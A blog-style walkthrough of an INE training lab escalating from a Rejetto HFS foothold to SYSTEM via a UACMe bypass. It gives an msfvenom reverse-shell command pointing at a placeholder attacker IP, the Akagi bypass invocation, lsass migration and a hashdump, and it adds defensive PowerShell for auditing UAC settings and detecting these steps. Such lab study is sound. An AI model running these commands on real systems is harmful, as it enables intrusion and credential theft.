June 24, 2026
From Foothold to SYSTEM: Bypassing Windows UAC with UACMe
I recently completed an INE practical lab on Windows privilege escalation and wanted to share a quick step-by-step breakdown.
By Pradeep Mphector
This walkthrough shows how a simple vulnerability in a web service can lead to full control of a machine (NT AUTHORITY\SYSTEM) if User Account Control (UAC) is not properly secured.
Initial Foothold via Rejetto HFS
During host enumeration of demo.ine.local, Port 80 was identified as running Rejetto HTTP File Server (HFS).
- Exploited this known remote code execution vulnerability using Metasploit's rejetto_hfs_exec module.
- Successfully established a low-integrity Meterpreter session on Windows Server 2012.
Hitting the UAC Wall:
Using getuid and net localgroup administrators, I confirmed the current user session was running as Victim\admin, a member of the local Administrators group.
However, attempting to change the account password resulted in an immediate "Access is denied" error.
- The Reason: User Account Control (UAC) was active. In Windows, local administrative accounts run with a Medium Integrity token by default. Unless a process is explicitly elevated to High Integrity, administrative actions are blocked.
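Whether that Medium Integrity token can be raised to High Integrity without an interactive prompt is decided by a handful of UAC policy values. The following PowerShell audit is an added example for this write-up, not part of the INE lab or the UACMe project; the registry path and value names (EnableLUA, ConsentPromptBehaviorAdmin, PromptOnSecureDesktop) are the documented Windows policy values, and the defaults assumed when a value is absent are the standard Windows defaults.

```powershell
# Added example: report the UAC policy values that govern silent elevation of an
# administrator's Medium Integrity token. Run in an elevated or non-elevated
# PowerShell; reading the key needs no special rights.
function Get-UacPosture {
    [CmdletBinding()]
    param(
        [string]$PolicyKey = 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System'
    )

    $p = Get-ItemProperty -Path $PolicyKey -ErrorAction Stop

    # Windows defaults when a value has never been written.
    $enableLua   = if ($null -ne $p.EnableLUA) { [int]$p.EnableLUA } else { 1 }
    $adminPrompt = if ($null -ne $p.ConsentPromptBehaviorAdmin) { [int]$p.ConsentPromptBehaviorAdmin } else { 5 }
    $secureDesk  = if ($null -ne $p.PromptOnSecureDesktop) { [int]$p.PromptOnSecureDesktop } else { 1 }

    $findings = @()
    if ($enableLua -eq 0) {
        $findings += 'EnableLUA=0: UAC is disabled; every admin logon already receives a full token.'
    }
    if ($adminPrompt -eq 0) {
        $findings += 'ConsentPromptBehaviorAdmin=0: elevate without prompting; any Medium IL admin process can elevate silently.'
    }
    elseif ($adminPrompt -eq 5) {
        $findings += 'ConsentPromptBehaviorAdmin=5 (default): signed Windows binaries auto-elevate without a prompt, the condition auto-elevation bypasses depend on.'
    }
    if ($secureDesk -eq 0) {
        $findings += 'PromptOnSecureDesktop=0: the consent prompt appears on the normal desktop instead of the secure desktop.'
    }

    # Values 1 and 2 both force a prompt on the secure desktop for every elevation ("Always notify").
    [pscustomobject]@{
        EnableLUA                  = $enableLua
        ConsentPromptBehaviorAdmin = $adminPrompt
        PromptOnSecureDesktop      = $secureDesk
        Hardened                   = ($enableLua -eq 1 -and ($adminPrompt -eq 1 -or $adminPrompt -eq 2) -and $secureDesk -eq 1)
        Findings                   = $findings
    }
}

# Usage:
#   Get-UacPosture | Format-List
# Hardening (run as administrator) moves the host to "Always notify", which
# removes the silent auto-elevation that a Medium IL admin process would need:
#   Set-ItemProperty -Path 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System' -Name ConsentPromptBehaviorAdmin -Value 2
```

The `Hardened` flag is deliberately strict: the default level 5 is reported as a finding because it is exactly the configuration in which built-in auto-elevating binaries are trusted without a prompt.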
Bypassing UAC with UACMe (Akagi)
To bypass the UAC restriction, I used UACMe, an open-source tool that leverages built-in Windows features to auto-elevate process privileges.
1. Payload Generation: created a standard reverse shell binary using msfvenom:
- msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Kali_IP> LPORT=4444 -f exe > backdoor.exe
2. Staging: created a C:\temp directory on the target host and uploaded both backdoor.exe and Akagi64.exe.
3. Execution: started a multi-handler listener on Kali Linux, then used Akagi Method 23 (Camberley/CurVer bypass method) to launch the backdoor payload with elevated rights:
- .\Akagi64.exe 23 C:\temp\backdoor.exe
Achieving SYSTEM Privileges & Credential Dumping
The listener successfully caught a high-integrity administrative session.
From there, full host compromise was achieved:
- Listed running processes (ps) and migrated the session directly into the Local Security Authority Subsystem Service (lsass.exe). Successfully escalated privileges to NT AUTHORITY\SYSTEM.
- Executed hashdump to harvest local account NTLM hashes, extracting the administrator's credentials for credential management assessment.
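Both steps above leave footprints a defender can look for: a High Integrity process starting from a user-writable staging directory, and a non-system process opening lsass.exe with the rights a migration needs. The triage routine below is an added example written for this post, not code from the lab or from UACMe; the event records in `$SampleEvents` are constructed for the example, and the field names (EventId, Image, ParentImage, IntegrityLevel, SourceImage, TargetImage, GrantedAccess) follow Sysmon's Event ID 1 and Event ID 10 schema. The allow-list of processes that may legitimately open lsass.exe is a placeholder to be tuned per environment.

```powershell
# Added example: two detection rules over Sysmon-style process events.
#   Rule 'lsass-inject'          - Event ID 10 where the target is lsass.exe and the
#                                  granted rights include thread creation or memory
#                                  write (what a Meterpreter migrate requires).
#   Rule 'high-il-from-staging'  - Event ID 1 at High integrity whose image lives in
#                                  a user-writable staging directory.
# Access-mask bits are the documented Win32 process rights.
$PROCESS_CREATE_THREAD = 0x0002
$PROCESS_VM_WRITE      = 0x0020

function Find-SuspiciousEvents {
    param(
        [Parameter(Mandatory)][object[]]$Events,
        # Assumed allow-list; replace with the processes observed opening lsass on your hosts.
        [string[]]$LsassAllowList = @(
            'C:\Windows\System32\csrss.exe',
            'C:\Windows\System32\wininit.exe',
            'C:\Windows\System32\svchost.exe'
        ),
        [string[]]$StagingDirs = @('C:\temp\', 'C:\Users\Public\')
    )

    foreach ($e in $Events) {
        if ($e.EventId -eq 10 -and
            $e.TargetImage -like '*\lsass.exe' -and
            $LsassAllowList -notcontains $e.SourceImage) {

            # Sysmon logs GrantedAccess as a hex string such as '0x1FFFFF'; [int] parses it.
            $rights = [int]$e.GrantedAccess
            if (($rights -band ($PROCESS_CREATE_THREAD -bor $PROCESS_VM_WRITE)) -ne 0) {
                [pscustomobject]@{
                    Rule   = 'lsass-inject'
                    Source = $e.SourceImage
                    Detail = "GrantedAccess=$($e.GrantedAccess)"
                }
            }
        }
        elseif ($e.EventId -eq 1 -and $e.IntegrityLevel -eq 'High') {
            foreach ($dir in $StagingDirs) {
                if ($e.Image -like "$dir*") {
                    [pscustomobject]@{
                        Rule   = 'high-il-from-staging'
                        Source = $e.Image
                        Detail = "Parent=$($e.ParentImage)"
                    }
                    break
                }
            }
        }
    }
}

# Constructed sample records (not real telemetry). Only the first two should match.
$SampleEvents = @(
    @{ EventId = 1;  Image = 'C:\temp\backdoor.exe'; ParentImage = 'C:\Windows\System32\cmd.exe'; IntegrityLevel = 'High' },
    @{ EventId = 10; SourceImage = 'C:\temp\backdoor.exe'; TargetImage = 'C:\Windows\System32\lsass.exe'; GrantedAccess = '0x1FFFFF' },
    @{ EventId = 10; SourceImage = 'C:\Windows\System32\svchost.exe'; TargetImage = 'C:\Windows\System32\lsass.exe'; GrantedAccess = '0x1000' },
    @{ EventId = 1;  Image = 'C:\Windows\System32\notepad.exe'; ParentImage = 'C:\Windows\explorer.exe'; IntegrityLevel = 'Medium' }
)

Find-SuspiciousEvents -Events $SampleEvents | Format-Table -AutoSize
```

Against real data, replace `$SampleEvents` with the output of `Get-WinEvent -LogName 'Microsoft-Windows-Sysmon/Operational'` mapped onto the same field names; the allow-list matters because several system processes open lsass.exe as part of normal operation, and a rule keyed on the access mask alone will page on them.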
Key Takeaway:
Membership in the local Administrators group does not mean security controls are bypassed automatically.
If basic administrative commands fail on an admin account, UAC is likely active, making specialized verification tools like UACMe essential for thorough penetration testing.